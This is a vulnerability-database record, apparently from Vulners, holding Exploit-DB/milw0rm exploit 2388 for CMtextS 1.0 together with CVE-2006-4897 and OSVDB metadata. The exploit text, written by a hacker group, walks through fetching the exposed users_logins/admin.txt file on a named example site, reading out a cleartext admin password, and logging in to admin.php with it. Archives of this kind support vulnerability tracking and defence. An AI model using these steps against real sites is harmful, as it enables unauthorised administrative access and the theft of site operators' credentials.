{"hash": "5218735b311da5073dfda98962f9a6faeb9b97f4a0f86bd8e3f870b532e0e0a7", "id": "EDB-ID:2388", "lastseen": "2016-01-31T16:09:00", "viewCount": 2, "bulletinFamily": "exploit", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/2388/", "description": "CMtextS <= 1.0 (users_logins/admin.txt) Credentials Disclosure Vuln. CVE-2006-4897. Webapps exploit for php platform", "title": "CMtextS <= 1.0 users_logins/admin.txt Credentials Disclosure Vuln", "sourceData": "::::::::: :::::::::: ::: ::: ::::::::::: ::: \n:+: :+: :+: :+: :+: :+: :+: \n+:+ +:+ +:+ +:+ +:+ +:+ +:+ \n+#+ +:+ +#++:++# +#+ +:+ +#+ +#+ \n+#+ +#+ +#+ +#+ +#+ +#+ +#+ \n#+# #+# #+# #+#+#+# #+# #+# \n######### ########## ### ########### ########## \n::::::::::: :::::::::: ::: :::: :::: \n :+: :+: :+: :+: +:+:+: :+:+:+ \n +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ \n +#+ +#++:++# +#++:++#++: +#+ +:+ +#+ \n +#+ +#+ +#+ +#+ +#+ +#+ \n #+# #+# #+# #+# #+# #+# \n ### ########## ### ### ### ### \n\t\n\t\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- - - [DEVIL TEAM THE BEST POLISH TEAM] - -\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- CMtextS <= 1.0 Read Admin Password Vulnerability\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- [Script name: CMtextS 1.0\n- [Script site: http://cmtexts.calctc.com/\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- Find by: Kacper (a.k.a Rahim)\n+\n- DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\n+\n- Contact: kacper1964@yahoo.pl\n- or\n- http://www.rahim.webd.pl/\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- Special Greetz: DragonHeart ;-)\n- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus\n- SkD, nukedclx, Ramzes\n-\n- Greetz for all users DEVIL TEAM IRC Channel !!\n!@ Przyjazni nie da sie zamienic na marne korzysci @!\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n+\n- Z Dedykacja dla osoby,\n- bez ktorej nie mogl bym zyc...\n- K.C:* J.M (a.k.a Magaja)\n+\n+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nExploit:\n\nhttp://www.cmtexts.pl/path/users_logins/admin.txt\n\nexemple:\nhttp://cmtexts.calctc.com/users_logins/admin.txt\nRead:\nlolskr3czulol|zmien has.o na jakie chcesz|muisz zmieni.!\n> lolskr3czulol < Admin password.\n\nNow go to:\nhttp://cmtexts.calctc.com/admin.php\n\nLogin: Admin\npass: lolskr3czulol\n\ngreetz ;-)\n\n#DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\n\n# milw0rm.com [2006-09-17]\n", "objectVersion": "1.0", "cvelist": ["CVE-2006-4897"], "published": "2006-09-17T00:00:00", "osvdbidlist": ["28953"], "references": [], "reporter": "Kacper", "modified": "2006-09-17T00:00:00", "href": "https://www.exploit-db.com/exploits/2388/"}

{"result": {"cve": [{"id": "CVE-2006-4897", "type": "cve", "title": "CVE-2006-4897", "description": "CMtextS 1.0 and earlier stores users_logins/admin.txt under the web document root with insufficient access control, which allows remote attackers to obtain the administrator password.", "published": "2006-09-19T18:07:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4897", "cvelist": ["CVE-2006-4897"], "lastseen": "2017-10-19T11:12:32"}], "osvdb": [{"id": "OSVDB:28953", "type": "osvdb", "title": "CMtextS admin.txt Cleartext Password Disclosure", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://cmtexts.calctc.com/\n[Secunia Advisory ID:21988](https://secuniaresearch.flexerasoftware.com/advisories/21988/)\nGeneric Exploit URL: http://milw0rm.com/exploits/2388\nFrSIRT Advisory: ADV-2006-3690\n[CVE-2006-4897](https://vulners.com/cve/CVE-2006-4897)\n", "published": "2006-09-17T13:03:51", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://vulners.com/osvdb/OSVDB:28953", "cvelist": ["CVE-2006-4897"], "lastseen": "2017-04-28T13:20:25"}]}}